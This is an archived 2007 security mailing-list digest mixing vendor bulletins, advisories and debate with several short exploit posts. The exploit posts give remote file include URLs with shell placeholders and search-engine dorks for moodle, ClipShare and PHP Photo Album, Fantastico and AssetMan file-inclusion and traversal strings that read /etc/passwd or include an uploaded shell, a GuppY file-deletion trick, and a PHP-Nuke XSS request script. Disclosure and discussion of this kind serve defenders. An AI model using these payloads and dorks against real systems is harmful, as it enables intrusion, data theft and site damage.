Re: Php Nuke POST XSS on steroids

[ascii]

Paul Laudanski wrote:
> I tried both your scripts at a few locations, and all I get back is this
[cut]

hi Paul, long time from ccc : )

it happens because http headers must be on a single line, it's a
formatting issue (my fault, i used to put a link to a plain text
version but this time i forgot about it), i've just created a txt
version of the advisory available here:

http://phpfi.com/214668

it should be more usable, i dunno when the demos will stop working
on phpnuke.org so i've asked wisec to upload this video since www.ush.it
has bandwidth issues

http://www.wisec.it/ush/phpnukexss.html

obviously to bypass the anti-CSRF filter you have to mix the XSS with
the import_request_variables() trick (this doesn't work on phpnuke.org
because they have globals on, this is why i choose that domain)

consider that import_request_variables() will allows you to do much
more than an XSS, this is just an example advisory on an example product

See you,
Francesco `ascii` Ongaro
http://www.ush.it/

Remote File Include In Script moodle-1.7.1

[RaeD Hasadya]

By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
--
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
--
B.Files : 
utfdbmigrate.php
filter.php
--
Exploits :
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]

 

-- 
___
Get your free email from http://bsdmail.com

Re: PHP-Nuke <= 8.0 Cookie Manipulation (lang)

[Paul Laudanski]

[EMAIL PROTECTED] wrote:

Patch:

} elseif (isset($lang)) {
   if (eregi('[A-Za-z]', $lang)) {
  if (file_exists("language/lang-".$lang.".php")) {
   include_once("language/lang-".$lang.".php");
$currentlang = $lang;
}else {
  include_once("language/lang-english.php");
$currentlang = "english";
		} 
	  }else {

   include_once("language/lang-english.php");
   $currentlang = "english";
  }
} else {

/
Best Regards
Aleksandar
Programmer and Web Developer
///

  
Building on your patch you'd want to incorporate basename().  You never 
want to accept directory traversal attempts into variables.


Paul Laudanski, CastleCops
http://www.linkedin.com/pub/1/49a/17b
Submit Phish: www.castlecops.com/pirt
www.castlecops.com | de.castlecops.com | wiki.castlecops.com

GuppY v4.0 remote del files/index

[sn0oPy . team]

* GuppY v4.0 remote del files/index

* By : sn0oPy

* Risk : high

* site :  http://www.freeguppy.org/

* Dork : inurl:"/guppy/index.php"

* exploit :

 just add install/install.php to the script folder
 http://www.target.ma/guppy/install/install.php
 choose "Installation propre" >>> next >>> choose "Suppression des 
fichiers d'installation"  >>> next >>>


* contact : [EMAIL PROTECTED]

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2728

[security bulletin] HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00876579
Version: 2

HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of 
Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-03-09
Last Updated: 2007-03-09

Potential Security Impact: Remote execution of arbitrary code.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Java Runtime Environment (JRE) and Java Developer Kit (JDK) may allow a remote 
user to execute arbitrary code.

References: CVE-2007-0243, CVE-2006-6745, CVE-2006-6731

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 and B.11.23 running Java Runtime Environment (JRE) and Java 
Developer Kit (JDK):
Release 5.0.05 i.e., Release 1.5.0.05,
Release 1.4.2.11 and earlier,
Release 1.3.1.19 and earlier.

BACKGROUND

The Sun Java Runtime Environment (JRE) and Java Developer Kit (JDK) contain 
multiple vulnerabilities that can allow a remote, unauthenticated user to 
execute arbitrary code on a vulnerable system.

AFFECTED VERSIONS

NOTE: To determine if a system has an affected version, search the output of 
"swlist -a revision -l fileset" for an affected fileset. Then determine if a 
fixed revision or applicable patch is installed.

HP-UX B.11.11
HP-UX B.11.23
===
Jpi14.JPI14-COM
Jpi14.JPI14-COM-DOC
Jpi14.JPI14-IPF32
Jpi14.JPI14-PA11
Jdk14.JDK14-COM
Jdk14.JDK14-DEMO
Jdk14.JDK14-IPF32
Jdk14.JDK14-IPF64
Jdk14.JDK14-PA11
Jdk14.JDK14-PA20
Jdk14.JDK14-PA20W
Jdk14.JDK14-PNV2
Jdk14.JDK14-PWV2
Jre14.JRE14-COM
Jre14.JRE14-COM-DOC
Jre14.JRE14-IPF32
Jre14.JRE14-IPF32-HS
Jre14.JRE14-IPF64
Jre14.JRE14-IPF64-HS
Jre14.JRE14-PA11
Jre14.JRE14-PA11-HS
Jre14.JRE14-PA20
Jre14.JRE14-PA20-HS
Jre14.JRE14-PA20W
Jre14.JRE14-PA20W-HS
Jre14.JRE14-PNV2
Jre14.JRE14-PNV2-H
Jre14.JRE14-PWV2
Jre14.JRE14-PWV2-H
action:install revision 1.4.2.12.00 or subsequent.

Jdk15.JDK15-COM
Jdk15.JDK15-DEMO
Jdk15.JDK15-IPF32
Jdk15.JDK15-IPF64
Jdk15.JDK15-PA20
Jdk15.JDK15-PA20W
Jdk15.JDK15-PNV2
Jdk15.JDK15-PWV2
Jre15.JRE15-COM
Jre15.JRE15-COM-DOC
Jre15.JRE15-IPF32
Jre15.JRE15-IPF32-HS
Jre15.JRE15-IPF64
Jre15.JRE15-IPF64-HS
Jre15.JRE15-PA20
Jre15.JRE15-PA20-HS
Jre15.JRE15-PA20W
Jre15.JRE15-PA20W-HS
Jre15.JRE15-PNV2
Jre15.JRE15-PNV2-H
Jre15.JRE15-PWV2
Jre15.JRE15-PWV2-H
action:install revision 1.5.0.06 or subsequent

END AFFECTED VERSIONS

NOTE: The version number returned by "$java -version" and the version returned 
by swlist for Java are different. For example, when the $java -version is 5.0.6 
the version shown by swlist is 1.5.0.06.

RESOLUTION

HP is providing the following Java updates to resolve the JRE potential 
vulnerability. The updates are available from: http://www.hp.com/go/java The HP 
website mentions Java 5.0, which can be recognized from the swlist -l fileset 
return value of 1.5.0.01.06.
These issues are addressed in the following versions of the HP Java:
* JDK and JRE 1.5.0.6 or subsequent,
* SDK and JRE 1.4.2.12 or subsequent,
* SDK and JRE 1.3.1.20 or subsequent.
If the latest version of Java is installed, older versions of Java may remain 
installed on the system. If these versions of Java are not needed, you may wish 
to remove them.

MANUAL ACTIONS: Yes - Update
For Java 1.5.0.00.00, update to Java 1.5.0.06 or subsequent.
 ->For Java 1.4.2.11 and earlier, update to revision 1.4.2.12 or subsequent.
For Java 1.3.1.19 or earlier, update to revision 1.3.1.20 so subsequent.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

HISTORY:
Version: 1 (rev.1) 06 March 2007 Initial release
Version: 2 (rev.2) 09 March 2007 Corrected typo in Manual Actions, in SSRT #.

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and p

RIM BlackBerry Pearl 8100 Browser DoS

[clappymonkey]

RIM BlackBerry Pearl 8100 Browser DoS
--

12 March 2007

Summary:
A vulnerability has been discovered that could impact upon the availability of 
the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a remote 
attacker to construct a WML page that contains an overly long string value 
within a link (e.g.: ). Should the page or 
link be accessed by BlackBerry devices, this leads to a temporary Denial of 
Service within the 4thPass browser component on the device, and temporary 
device inoperability. Normal functionality will be returned to the browser / 
device after an amount of time relative to the size of the link supplied, or by 
physically removing and reinserting the battery thereby creating a reset.

Business Impact:
Exploitation of this issue can lead to a loss of device functionality.  

Affected Product(s):
The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51)

Remediation:
Upgrade to vendor patch 4.2.1

Additional details of this vulnerability are available from the vendor at 
www.blackberry.com/security/news.jsp

Credit:
Michael Kemp (www.clappymonkey.com)

Fantastico In all Version Cpanel 10.x <= local File Include

[z3r0 z3r0.2.z3r0]

##
Fantastico In all Version Cpanel 10.x <= local File Include

##to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
   include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First  Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php   D:

:::xploit
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###


Discoverd By : cyb3rt & 020
###

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###

Remote File Include In ClipShare.v1.5.3

[RaeD Hasadya]

By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com

Script : ClipShare.v1.5.3
Dork : "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved"

B.File : 
adodb-connection.inc.php

Exploit : 
http://www.Victim.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack]


-- 
___
Get your free email from http://bsdmail.com

Re: Php Nuke POST XSS on steroids

[Paul Laudanski]

ascii wrote:

Php Nuke POST XSS on steroids

 Name  Php Nuke POST XSS on steroids
 Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
   others (partially verified)
 Severity  Medium
 Vendorhttp://php nuke.org/
 Advisory  http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
 Authors   Francesco `ascii` Ongaro ([EMAIL PROTECTED])
   Stefano `wisec` di Paola ([EMAIL PROTECTED])
 Date  20070307
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8

#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

query=token<>token

TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv

--- >8 --- >8 --- >8 --- >8 ---  --- >8 --- >8 --- >8 --- >8

$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
http://www.ush.it/

  

I tried both your scripts at a few locations, and all I get back is this:



400 Bad Request

Bad Request
Your browser sent a request that this server could not understand.
Request header field is missing ':' separator.

Gecko/20070220 Firefox/2.0.0.2

Re: Wiki Remote Authentication Bypass Vulnerability

[Matt D. Harris]

This is the designed behavior of the application, not an "exploit" as 
you claim.  In addition to that, the syntax used in your example URL's 
is specific to MediaWiki, and not common amongst all wiki apps, as you 
claim.  Furthermore, this "exploit" does not work "100% of the time" - 
even if this could be called an exploit, which it clearly is not, 
protecting an entry and configuring levels of access are relatively 
common and simple tasks for Wiki administrators.
Your claim that this is an access validation error is simply wrong, and 
is akin to saying that being able to write to a file which a user 
intentionally sets to mode 0777 is an error.

- Matt

[EMAIL PROTECTED] wrote:

Wiki Remote Authentication Bypass Vulnerability



The Exploit Works 100 % of the time. It really is up to the admin to add 
security
like locking a page to prevent editing. There are Two ways of having this 
Exploit
work. One is simply add the code (example 1) after the Page you wanna test or 
if that dosent work, add Code (example 2) and Exploit code after the new pages 
Name! Anyone using any type of Wiki project is vulnerable. Successfully 
exploiting this issue allows remote attackers to gain remote administrative 
access to the vulnerable sites Pages. Attackers can use a browser to exploit 
this issue.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz



Class: Access Validation Error

Remote: Yes



Vendor: http://www.wiki.org/
Version: N/A



Exploit: ?action=edit

Example 1: http://www.Site.com/wiki/Main_Page?action=edit

Example 2: http://www.Site.com/wiki/Hacked?action=edit



Proff of Concept: (Concealed)



Security researcher? Join us: mail Zinho at zinho at hackerscenter.com



--
/*
 * Matt D. Harris <[EMAIL PROTECTED]>
 *  Solitox Networks - Lead Project Engineer
 */

AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability

[BorN To K!LL BorN To K!LL]

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
|
|Script: AssetMan
|
|Verson: 2.4a
|
|URL: http://www.bctree.com/~assetman/assetman-2.4a.zip
|
|Discover: BorN To K!LL
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|Bug in:
|download_pdf.php
|
|Code:
|readfile($_GET["pdf_file"]);
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|ExploiT:
|~
|wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd
|
|+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|GreeTz 2:
|Dr.2 - str0ke - AsbMay .
|
|KuW SeC  AsbMay's Group 
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Remote File Include In Script PHP Photo Album

[RaeD Hasadya]

By Hasadya Raed
Contact : [EMAIL PROTECTED]
-
Script : PHP Photo Album
Dork : "Powered by PHP Photo Album"
-
B.File :
common.php
--
Exploit : 
http://www.Victim.com/Path_Script/common.php?db_file=[Shell-Attack]
 


-- 
___
Get your free email from http://bsdmail.com

Wiki Remote Authentication Bypass Vulnerability

[DoZ]

Wiki Remote Authentication Bypass Vulnerability



The Exploit Works 100 % of the time. It really is up to the admin to add 
security
like locking a page to prevent editing. There are Two ways of having this 
Exploit
work. One is simply add the code (example 1) after the Page you wanna test or 
if that dosent work, add Code (example 2) and Exploit code after the new pages 
Name! Anyone using any type of Wiki project is vulnerable. Successfully 
exploiting this issue allows remote attackers to gain remote administrative 
access to the vulnerable sites Pages. Attackers can use a browser to exploit 
this issue.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz



Class: Access Validation Error

Remote: Yes



Vendor: http://www.wiki.org/
Version: N/A



Exploit: ?action=edit

Example 1: http://www.Site.com/wiki/Main_Page?action=edit

Example 2: http://www.Site.com/wiki/Hacked?action=edit



Proff of Concept: (Concealed)



Security researcher? Join us: mail Zinho at zinho at hackerscenter.com

Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

[3APA3A]

Dear Thor (Hammer of God),

 You are wrong at least for Windows XP/2003. There is a common temporary
 directory

 %WINDIR%\Temp

 It's  used  as a %TEMP% if application is launched without local logon,
 e.g. system service.

 For  example, services launched with LocalSystem account will have this
 environment variables:

SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService
 

 You  can  find  it's really used, because it's never empty. I see, e.g.
 files  related  to  different  Intel  drivers,  VMWare,  Microsoft .Net
 framework, Exchange and Sharepoint.

 Also,  I  remember  I  had  problems with securing ABN AMRO Bank client
 software installation, because it uses %WINDIR%\Temp for some reason.

 And now is most exciting: Users have permission to create files in this
 directory, that is pre-open attack is possible.

--Saturday, March 10, 2007, 7:28:27 PM, you wrote to bugtraq@securityfocus.com:

THoG> Apps utilizing temporary files should always use the TEMP or TMP 
environment
THoG> variables, not a hard-coded path.  And by default, each user has their own
THoG> temp directory created (in XP/Server it is "\Documents and 
THoG> Settings\username\Local Settings\temp" and in Vista it is 
THoG> "\Users\username\AppData\Local\Temp") that only they have permissions to
THoG> (with SYSTEM and Administrators, of course).  It's not like there is some
THoG> global "Full Control" temp directory created by default.

THoG> t



THoG> - Original Message - 
THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]>
THoG> To: "Tim" <[EMAIL PROTECTED]>
THoG> Cc: ;
THoG> 
THoG> Sent: Friday, March 09, 2007 9:42 AM
THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues


THoG> So, let me get this. An app storing sensitive data doesn't make its own
THoG> temp storage folders in a secure location, and instead relies upon one
THoG> of the few folders in Windows that all users have Full Control to, and
THoG> this is a Windows problem?  In Linux, if an app uses \tmp, is that a
THoG> Linux issue?

THoG> Sounds like a developer issue to me.

THoG> Roger

THoG> -Original Message-
THoG> From: Tim [mailto:[EMAIL PROTECTED]
THoG> Sent: Friday, March 09, 2007 11:20 AM
THoG> To: Roger A. Grimes
THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues


THoG> I find your assessment somewhat short-sighted.  I have conducted code
THoG> reviews on several commercial apps which use C:\TEMP in very insecure
THoG> ways to store sensitive data.  It seems some of these attacks would be
THoG> possible in those situations.

THoG> Sure, Windows is already pathetically insecure against an attackers
THoG> already on the local system, but this would be yet another attack
THoG> vector.

THoG> tim




-- 
~/ZARAZA http://securityvulns.com/
ÝÍÈÀÊàì - ïî ìîðäå!  (Ëåì)

[security bulletin] HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00717872
Version: 2

HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-03-05
Last Updated: 2007-03-05

Potential Security Impact: Remote Unauthorized Access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX when running 
Service Locator Protocol (SLP).The vulnerability could be exploited by a remote 
user of Service Locator Protocol (SLP) for unauthorized access.

References: SUSE-SA:2005:015

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23

BACKGROUND

SLP implementation on HP-UX is based on OpenSLP version 0.8.0 developed by 
Caldera Systems, Inc. 

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for one of the filesets listed below. For 
affected systems verify that the recommended action has been taken. 

AFFECTED VERSIONS 
 ->HP-UX B.11.11 
=== 
upgrade_SLP.INETSVCS-RUN 
action: install revision 1.2 or subsequent 
 ->URL: http://software.hp.com 

HP-UX B.11.23 
=== 
InternetSrvcs.INETSVCS2-RUN 
action: install PHNE_33508 or subsequent 

END AFFECTED VERSIONS 



RESOLUTION
HP has made the following patch and web upgrade available to resolve this 
issue. 

B.11.23 PHNE_33508 or subsequent 
The patch can be retrieved from: http://itrc.hp.com 

 ->The B.11.11 SLP Revision 1.2 update can be retrieved from: 
http://software.hp.com 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically.  For 
more information see: https://www.hp.com/go/swa 

MANUAL ACTIONS: Yes - Update 

HP-UX B.11.11 Update to HP-UXSLP Revision 1.2 or subsequent 
HP-UX B.11.23 No manual actions 

HISTORY: 
Version: 1 (rev.1) 25 September 2006 Initial release 
Version: 2 (rev.2) 06 March 2007 Updated web upgrade location for B.11.11 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW 
MA = HP Management Agents 
MI = Misc. 3rd Party SW 
MP = HP MPE/iX 
NS = HP NonStop Servers 
OV = HP OpenVMS 
PI = HP Printing & Imaging 
ST = HP Storage SW 
TL = HP Trusted Linux 
TU = HP Tru64 UNIX 
UX = HP-UX 
VV = HP VirtualVault 

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all u

Re: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

[Thor (Hammer of God)]

2 things:

My point is what apps SHOULD do- use the "user" temp variable, not the 
system temp variable if you want to easily have inherited, user-based 
security.  Not sure why your ABN AMRO client makes it files in 
%WINDIR%\temp, but that's not necessary.  It probably requires local admin 
too, given that.


Secondly, I said there is not a "global Full Control" directory, and there 
is not.  The %WINDIR%\Temp directory has "special" permissions.  For users, 
it is only Traverse Folder/Execute File, Create Files/Write Data, and Create 
Folders/ Append Data.  Not List Folder/ Read Data, no read add tributes, not 
write attributes, not delete, etc, etc.


And all subfolders in Temp inherit those permissions.  I know it's used 
extensively by system and admin installation, but that's not my point at 
all.  Someone chimed in about C:\temp and sensitive data, and blah blah, so 
I simply stated that user variables usage for temp files mitigate that. 
Also, there is no "Global Full Control" directory created by default temp 
files and there's not.  Sure you can create on if you want and use that 
(which obviously someone did for C:\temp because it does not exist by 
default) but that's more of Roger's point in that "if you do things 
insecurely and without thinking, then someone can take advantage of that." 
And I think he's right on that.


But as Mark said, the overall issue is interesting at some level, 
particularly if you can leverage it even with limited permissions in 
\windows\temp, though I also think many many things must go "wrong" first. 
But, that being said, I've seen enough of your posts to know that you know 
what you are doing, so I have respect for your work even though I may not 
totally agree all the time.


t


Learn to secure your Microsoft installations with Tim Mullen's
"Microsoft Ninjitsu Black Belt Edition" at Blackhat Vegas.  Registration 
open now.

http://www.blackhat.com/html/bh-usa-07/train-bh-us-07-tm-ms-bbe.html





- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>

To: "Thor (Hammer of God)" <[EMAIL PROTECTED]>
Cc: ; "Roger A. Grimes" <[EMAIL PROTECTED]>; 
"Tim" <[EMAIL PROTECTED]>; 


Sent: Saturday, March 10, 2007 2:32 PM
Subject: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file 
management security issues



Dear Thor (Hammer of God),

You are wrong at least for Windows XP/2003. There is a common temporary
directory

%WINDIR%\Temp

It's  used  as a %TEMP% if application is launched without local logon,
e.g. system service.

For  example, services launched with LocalSystem account will have this
environment variables:

SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService


You  can  find  it's really used, because it's never empty. I see, e.g.
files  related  to  different  Intel  drivers,  VMWare,  Microsoft .Net
framework, Exchange and Sharepoint.

Also,  I  remember  I  had  problems with securing ABN AMRO Bank client
software installation, because it uses %WINDIR%\Temp for some reason.

And now is most exciting: Users have permission to create files in this
directory, that is pre-open attack is possible.

--Saturday, March 10, 2007, 7:28:27 PM, you wrote to 
bugtraq@securityfocus.com:


THoG> Apps utilizing temporary files should always use the TEMP or TMP 
environment
THoG> variables, not a hard-coded path.  And by default, each user has their 
own

THoG> temp directory created (in XP/Server it is "\Documents and
THoG> Settings\username\Local Settings\temp" and in Vista it is
THoG> "\Users\username\AppData\Local\Temp") that only they have permissions 
to
THoG> (with SYSTEM and Administrators, of course).  It's not like there is 
some

THoG> global "Full Control" temp directory created by default.

THoG> t



THoG> - Original Message - 
THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]>

THoG> To: "Tim" <[EMAIL PROTECTED]>
THoG> Cc: ;
THoG> 
THoG> Sent: Friday, March 09, 2007 9:42 AM
THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 
file

THoG> management security issues


THoG> So, let me get this. An app storing sensitive data doesn't make its 
own

THoG> temp storage folders in a secure location, and instead relies upon one
THoG> of the few folders in Windows that all users have Full Control to, and
THoG> this is a Windows problem?  In Linux, if an app uses \tmp, is that a
THoG> Linux issue?

THoG> Sounds like a developer issue to me.

THoG> Roger

THoG> -Original Message-
THoG> From: Tim [mailto:[EMAIL PROTECTED]
THoG> Sent: Friday, March 09, 2007 11:20 AM
THoG> To: Roger A. Grimes
THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 
file

THoG> management security issues


THoG> I find your assessment somewhat short-sighted.  I have conducted code
THoG> reviews on several commercial apps which use C:\TEMP in very insecure
THoG